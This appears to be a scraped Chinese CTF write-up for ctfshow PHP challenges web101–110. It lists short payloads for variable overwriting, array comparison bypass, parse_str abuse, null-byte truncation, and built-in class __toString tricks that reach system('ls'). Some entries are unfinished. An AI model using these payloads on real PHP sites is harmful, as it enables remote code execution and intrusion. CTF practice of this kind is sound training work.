当前位置: 首页 > news >正文

web入门101-110

web101

分析代码
image
不太会,借鉴大佬的payload
?v1=1&v2=echo new Reflectionclass&v3=;
image
还是一样的操作,把0x2d换成-;随后爆破最后一位flag

web102

分析代码
image
暂存

web103

分析代码
image
暂存

web104

分析代码
image
发现题目没有校验两个值不能相等,直接传入两个相同的值就行
image

web105

分析代码
image
变量覆盖

$key='error'
$value='suces'
$$key=$$value -> $error=$suces
GET:?suecs=flag
POST:error=suces
这样他们都等于flag

image

web106

分析代码
image
这次加了比较,可以用数组绕过

GET:?v2[]=1
POST:v1[]=2

image

web107

分析代码
image
parse_str(v1,v2),则会将v1解析后,放到v2变量里面。

GET:?v3[]=1
POST:v1=v2

image

web108

分析代码
image
分析需要输入字母,但是可以使用%00截断,然后c反转后取整的数字要等于877(0x36d的十进制),构造payload
?c=a%00778
image

web109

分析代码
image
echo会触发__toString()魔术方法,所以v1要传入一个包含该方法的内置类

CachingIterator::__toString()
DirectoryIterator::__toString
Error::__toString
Exception::__toString

?v1=CachingIterator&v2=system('ls')
image
查看fl36dg.txt
image

web110

分析代码
image
加了许多过滤条件,要用新的函数

FilesystemIterator:获取指定目录下的所有文件,用于构造新的文件系统迭代器
getcwd():将当前工作目录的绝对路径复制

构造payload
?v1=FilesystemIterator&v2=getcwd
image
获得flag的文件名,直接访问获得flag
image

http://www.jsqmd.com/news/263388/

相关文章:

  • 开题报告怎么写不返工?宏智树 AI 教你一招搞定学术敲门砖
  • 2026.1
  • 学习unigui【46】让客户端浏览器可以选下载你的apk
  • 告别 SPSS/Excel 数据分析噩梦!宏智树 AI:论文实证研究的智能数据管家
  • 毕业论文通关指南:宏智树 AI 教你避开写作那些坑
  • 【AUTOSAR AP Core 】AUTOSAR AP Core集成测试关键策略
  • 程序员必看:大模型时代如何突围?从地铁求职广告看AI转型之路
  • 深度测评9个AI论文软件,助本科生轻松搞定毕业论文!
  • 告别文献堆砌!宏智树 AI:一键解锁文献综述的逻辑进阶术
  • 从“需求解读员“到“大模型兜底侠“:我的AI产品实践 | 程序员必藏
  • 学霸同款9个AI论文软件,继续教育学生必备!
  • springboot的智能民宿预定与游玩系统设计与实现
  • 太原文创伴手礼定制哪家性价比高
  • 【毕业设计】基于微信小程序的博物馆文创系统的设计与实现基于springboot+微信小程序的多平台的博物馆预约系统的设计与实现(源码+文档+远程调试,全bao定制等)
  • 小程序毕设选题推荐:基于微信小程序的博物馆服务系统的设计与实现基于springboot+微信小程序的多平台的博物馆预约系统的设计与实现【附源码、mysql、文档、调试+代码讲解+全bao等】
  • 【课程设计/毕业设计】基于协同过滤算法的彩妆商城系统的设计与实现基于springboot+协同过滤算法的美妆护理类的购物平台小程序【附源码、数据库、万字文档】
  • 氪金手游
  • ABC 441 G(线段树多懒标记维护)
  • 小程序计算机毕设之基于Java+SpringBoot+Vue的博物馆游客预约系统基于springboot+微信小程序的多平台的博物馆预约系统的设计与实现(完整前后端代码+说明文档+LW,调试定制等)
  • 必看!零基础转行AIGC产品经理的完整路径,收藏这篇就够了
  • STM32F0实战:基于HAL库开发【1.4】
  • 基于AI客服链动2+1模式商城小程序的社群运营策略研究——以千人社群活跃度提升为例
  • 勇气
  • STM32F0实战:基于HAL库开发【1.5】
  • ABC 441 G(带有优先级的线段树懒标记处理)
  • Youtu-GraphRAG论文精读:垂直统一框架实现GraphRAG性能飞跃,成本节省90%+准确率提升16%+
  • AI Agent生存公式:四维乘积模型设计与评估指南(程序员收藏必备)
  • 抖音直播间弹幕实时提取
  • AI测试革命:从传统验证到三层评估体系,程序员必学指南(建议收藏)
  • 小程序毕设选题推荐:基于springboot+微信小程序的城镇职工城镇医疗保险缴纳报销基本医保云上管理系统【附源码、mysql、文档、调试+代码讲解+全bao等】